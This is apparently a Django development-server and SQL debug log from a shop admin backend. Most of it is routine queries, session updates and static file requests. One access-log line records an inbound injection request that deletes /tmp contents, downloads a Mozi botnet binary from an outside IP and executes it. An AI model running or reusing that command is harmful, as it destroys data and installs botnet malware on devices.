SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 09:22:20,636 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 09:22:20,640 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 09:22:20,644 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 09:22:20,648 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 09:22:20,652 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 09:22:20,656 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 09:22:20,660 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [11/Dec/2019 09:22:20] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [11/Dec/2019 09:22:52] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:28:30] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:33:33] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:34:19] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.123.246.188:48196/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 301 0 [11/Dec/2019 09:38:36] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:43:39] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:48:42] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:53:44] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:00:01] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:15:09] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 06, 2019 - 13:59:51 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-11 10:20:06,890 utils 29004 139898574604032 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-11 10:20:06,895 utils 29004 139898574604032 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [11/Dec/2019 10:20:50] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:26:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 10:31:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 10:33:54,786 utils 29004 139898474051328 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:33:54.772557+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 33, 54, 772557, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:33:54,790 utils 29004 139898474051328 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:33:54,846 utils 29004 139898474051328 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-11 10:33:54,859 utils 29004 139898474051328 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:33:54.856948+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 33, 54, 856948, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:33:54] "GET / HTTP/1.0" 200 8857 [11/Dec/2019 10:33:55] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [11/Dec/2019 10:33:55] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [11/Dec/2019 10:33:55] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [11/Dec/2019 10:33:55] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [11/Dec/2019 10:33:55] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [11/Dec/2019 10:33:55] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [11/Dec/2019 10:33:55] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 [11/Dec/2019 10:33:56] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [11/Dec/2019 10:33:56] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [11/Dec/2019 10:33:56] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-11 10:33:58,405 utils 29004 139898460284672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:33:58.395607+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 33, 58, 395607, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:33:58,407 utils 29004 139898460284672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:33:58,410 utils 29004 139898460284672 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-11 10:33:58,411 utils 29004 139898460284672 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-11 10:33:58,417 utils 29004 139898460284672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-11 10:33:58,553 utils 29004 139898460284672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:33:58.550763+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 33, 58, 550763, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:33:58] "GET /shop/category/ HTTP/1.0" 200 6758 [11/Dec/2019 10:33:58] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-11 10:33:58,841 utils 29004 139898460284672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:33:58.826063+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 33, 58, 826063, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:33:58,845 utils 29004 139898460284672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 10:33:58] "GET /jsi18n/ HTTP/1.0" 200 3223 [11/Dec/2019 10:33:58] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [11/Dec/2019 10:33:58] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [11/Dec/2019 10:33:58] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [11/Dec/2019 10:33:58] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [11/Dec/2019 10:33:59] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [11/Dec/2019 10:33:59] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [11/Dec/2019 10:33:59] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [11/Dec/2019 10:33:59] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [11/Dec/2019 10:34:01] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-11 10:34:03,395 utils 29004 139898474051328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:34:03.384826+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 34, 3, 384826, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:34:03,398 utils 29004 139898474051328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:34:03,401 utils 29004 139898474051328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-11 10:34:03,417 utils 29004 139898474051328 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-11 10:34:03,490 utils 29004 139898474051328 (0.002) DECLARE "_django_curs_139898474051328_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:34:03,548 utils 29004 139898474051328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:34:03.546731+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 34, 3, 546731, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 10:34:03] "GET /shop/category/10/change/ HTTP/1.0" 200 8024 [11/Dec/2019 10:34:03] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [11/Dec/2019 10:34:03] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-11 10:34:03,866 utils 29004 139898460284672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:34:03.855653+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 10, 34, 3, 855653, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 10:34:03,869 utils 29004 139898460284672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 10:34:03] "GET /jsi18n/ HTTP/1.0" 200 3223 [11/Dec/2019 10:34:03] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [11/Dec/2019 10:34:04] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [11/Dec/2019 10:34:34] "GET /shop/category/10/change/ HTTP/1.0" 302 0 DEBUG 2019-12-11 10:34:34,437 utils 29004 139898474051328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qgx948yvyo2p4q2sp1y5h2te5cd6hl5f' LIMIT 1; args=('qgx948yvyo2p4q2sp1y5h2te5cd6hl5f',) DEBUG 2019-12-11 10:34:34,440 utils 29004 139898474051328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qgx948yvyo2p4q2sp1y5h2te5cd6hl5f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T10:34:34.438377+00:00'::timestamptz); args=('qgx948yvyo2p4q2sp1y5h2te5cd6hl5f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 10, 34, 34, 438377, tzinfo=)) [11/Dec/2019 10:34:34] "GET /login/?next=/shop/category/10/change/ HTTP/1.0" 200 1834 DEBUG 2019-12-11 10:35:21,964 utils 29004 139898474051328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:35:21.955491+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 11, 10, 35, 21, 955491, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-11 10:35:21,966 utils 29004 139898474051328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:35:21,969 utils 29004 139898474051328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) Not Found: /robots.txt [11/Dec/2019 10:35:22] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-11 10:35:22,030 utils 29004 139898474051328 (0.002) DECLARE "_django_curs_139898474051328_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 10:35:22,079 utils 29004 139898474051328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:35:22.076564+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 35, 22, 76564, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [11/Dec/2019 10:35:22] "GET /shop/category/10/change/ HTTP/1.0" 200 8024 DEBUG 2019-12-11 10:35:22,472 utils 29004 139898474051328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:35:22.463378+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 11, 10, 35, 22, 463378, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-11 10:35:22,475 utils 29004 139898474051328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 10:35:22] "GET /jsi18n/ HTTP/1.0" 200 3223 [11/Dec/2019 10:35:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [11/Dec/2019 10:35:22] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [11/Dec/2019 10:35:22] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [11/Dec/2019 10:35:22] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [11/Dec/2019 10:35:22] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [11/Dec/2019 10:35:22] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [11/Dec/2019 10:35:22] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [11/Dec/2019 10:35:22] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [11/Dec/2019 10:35:22] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [11/Dec/2019 10:35:23] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [11/Dec/2019 10:35:23] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [11/Dec/2019 10:35:23] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [11/Dec/2019 10:35:23] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [11/Dec/2019 10:35:23] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [11/Dec/2019 10:35:23] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [11/Dec/2019 10:35:23] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [11/Dec/2019 10:35:23] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [11/Dec/2019 10:35:24] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [11/Dec/2019 10:35:24] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [11/Dec/2019 10:35:24] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [11/Dec/2019 10:35:26] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-11 10:36:15,876 utils 29004 139898474051328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T10:36:15.867836+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 11, 10, 36, 15, 867836, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-11 10:36:15,879 utils 29004 139898474051328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 10:36:15,905 utils 29004 139898474051328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T10:36:15.903812+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 10, 36, 15, 903812, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [11/Dec/2019 10:36:15] "GET /shop/ HTTP/1.0" 200 2790 [11/Dec/2019 10:36:16] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 /home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py changed, reloading. Performing system checks... December 11, 2019 - 